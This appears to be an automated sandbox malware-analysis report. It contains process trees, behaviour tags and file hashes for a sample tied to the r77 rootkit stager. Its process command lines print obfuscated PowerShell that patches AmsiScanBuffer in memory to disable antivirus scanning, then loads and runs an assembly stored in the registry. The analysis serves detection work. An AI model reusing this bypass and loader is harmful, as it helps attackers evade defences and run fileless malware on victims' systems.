@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$clZdOUKBIWi=$smGxynFlHuhkC.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EVLGDNMGdOdUkU=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$clZdOUKBIWi,[Object]('Load'+'LibraryA')));$tUgonAQzgoaRjxFau=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$clZdOUKBIWi,[Object]('Vir'+'tual'+'Pro'+'tect')));$zXIxall=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EVLGDNMGdOdUkU,$izAjtDpTcIykCFLvLFo).Invoke('a'+'m'+'si.dll');$LqcfvWYDFBJgJSDUM=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$zXIxall,[Object]('Ams'+'iSc'+'an'+'Buffer')));$LKXnSGWcBi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tUgonAQzgoaRjxFau,$zcszEmVRTVnMKlgIWZVgpJ).Invoke($LqcfvWYDFBJgJSDUM,[uint32]8,4,[ref]$LKXnSGWcBi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$LqcfvWYDFBJgJSDUM,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tUgonAQzgoaRjxFau,$zcszEmVRTVnMKlgIWZVgpJ).Invoke($LqcfvWYDFBJgJSDUM,[uint32]8,0x20,[ref]$LKXnSGWcBi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"1⤵PID:4620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OrcKlnKOHJta{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZkBOuMBKjzmISm,[Parameter(Position=1)][Type]$TTLjIuaxNc)$LORruiFvXUU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LORruiFvXUU.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ZkBOuMBKjzmISm).SetImplementationFlags('Runtime,Managed');$LORruiFvXUU.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$TTLjIuaxNc,$ZkBOuMBKjzmISm).SetImplementationFlags('Runtime,Managed');Write-Output $LORruiFvXUU.CreateType();}$HElwIrNbCPEps=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$NbBYFnZdLBdXUD=$HElwIrNbCPEps.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ObqsWLLoqAsNCkClHIu=OrcKlnKOHJta @([String])([IntPtr]);$JcstHrgkOadiYQpahjCtzI=OrcKlnKOHJta @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$amKDEwymedi=$HElwIrNbCPEps.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$wmFTlrkFCkPUwp=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$amKDEwymedi,[Object]('Load'+'LibraryA')));$XLzSFTPCeGfSoakCk=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$amKDEwymedi,[Object]('Vir'+'tual'+'Pro'+'tect')));$uhtiJOu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wmFTlrkFCkPUwp,$ObqsWLLoqAsNCkClHIu).Invoke('a'+'m'+'si.dll');$RdSeVohReyYAbPLiY=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$uhtiJOu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$BAnzZuInjX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XLzSFTPCeGfSoakCk,$JcstHrgkOadiYQpahjCtzI).Invoke($RdSeVohReyYAbPLiY,[uint32]8,4,[ref]$BAnzZuInjX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RdSeVohReyYAbPLiY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XLzSFTPCeGfSoakCk,$JcstHrgkOadiYQpahjCtzI).Invoke($RdSeVohReyYAbPLiY,[uint32]8,0x20,[ref]$BAnzZuInjX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:1852
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4548
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2464
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4988
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD54f273d79a4acba707b178973bfc53234
SHA1cbdfa28bb3aa56c96af48ad0a920471b113e44c8
SHA256e8164a316d279acd4968782793b8e7b03b8ae8d05685864bdfb8b47d818ce0d6
SHA5125b958a7e5629087b41d2c613ad49c3c12d13ba6612e4d87c3bbd82409a004e852743ec40c6e61982fad3055fe9eac91587282b17bdc1a84a5cf7d34411e7b720
-
Filesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
Filesize
1KB
MD53f632d570af86ca78a20fbcc245681d6
SHA1d63196420dc8a626a07fa83fb4dbc6f485fa2dbd
SHA256bc6762eae62b018f8b5857723cf71a46d6fb5f3315b655b6d7dc04e2b8786784
SHA51217b59b0e72e27f22cefd900fb91c247cba6c16e586d0ec3c40232c7ea05967bda22c5d83fa8b98beac8319eb180bbddd0cdc5e106786de5d9a3eea2f6271f990
-
Filesize
1KB
MD5e7043d2af5dd899a8c2f5a6636ef96d5
SHA1c428429d74bd22ea284cf382e027a5b29362554b
SHA256e9d59e5ff0d12b9f177e3e5d4c380d012d6a1092e8282037b2eaded1ebe5ac0f
SHA512d51e70e645f7633d737a8a88583698f34ef2a5005537d0b3700f5cb97b6f729264611a10999dacbe020982e7d26436f93ec9b5b0b64d6175ecd4d96419e8412d
-
Filesize
3KB
MD56251b857b601886d50f13c3df0476558
SHA1fa8955d57e903fce5db9cd52fb947aec7540644d
SHA256ee22a3c57c457b90784c6b5dc267d804e9fe23187da0caa53826e3554e4302e5
SHA51286c3ed7cbda90e57ea0c43ae94e927f176e161506084529c2c78041452ddfb381dade4028c18dce5d224b6c4d5eb44affdc4e7d75a818f2db98f9ba50d4aed96
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD54165a1eba27dd6609c90f10bcb875a49
SHA1640fcf84e4341491c88ca88f16f39ea210c1b11d
SHA256405e9a77857753d21e060dcffab12f820fa7593ae152b45588703bf312b5ff44
SHA512ffcfd27c95eab39fe142b1d76669fd15d0fa6898ecaf271b5744325c72c5883a3f5ebc5910d30b2627593b005e80d00e48ae58f608b0b929d240f1918f742dea
-
Filesize
522KB
MD570e8d86a49b0763449a4144627147cee
SHA11189cebeb8ffed7316f98b895ff949a726f4026f
SHA256ed24ed04b5d4a20b3f50fc088a455195c756d7b5315d1965e8c569472b43d939
SHA512f109e336ede5b18ac066616039253a6af624f320395f98821e6028dc7c8397d72aa9c367322eaef1e151ce25da19fc7acf63f94d97cf6923ce9fe279bf7d54b1
-
Filesize
351KB
MD5e2462dff81e09c335dd89f711c7a2fba
SHA15b9badc4d85f1ce4912772507523ab062a730d4e
SHA256fcd60b5bd3815f1c591ada33b9a46d4126c216dc32cc7b946352a938844138bd
SHA512bbedc7d5c74ecd851e422aa5c89768300b4522d08ef8f361c4eb84f6830d146bc0069c070f7fdf686f01eceed4786240a55770f8fcbcdf60902bc6c60cb4243e
-
Filesize
209KB
MD54383ce3239e9a18969c1790732c357a1
SHA10bc9aa83d04f66985a3eb477286288916b1ae2f2
SHA256d0e3d2042d56b24b7b5ac866a2edfbb7278543ecf25d390e4de1715e8eb570a1
SHA5125906f1b6d6ba229fbfe2bcf415ce1d0c65991e6b828fb8c2e57d55bec365d7d74d03b371ff31c818195b120e7137381146e0f2db20d79f5add7cf4e5b63e98d5
-
Filesize
844KB
MD5e3fed681d661be24b0b01bd141778315
SHA1409392eae3b648a9678e301cf38f85832d64c0c9
SHA2565ebc365cd9fa8cae3a7177f388ea6746f019aba5c4cca4a23450f4c4b0496de0
SHA5129c733f1faf6dc12e8b60f9ea8196e1dd1e429746ddb350a6111504047724eab7a8bad0e1c42db81af94f1fa214533a633252443edd2721ae00a6b3238ba0c797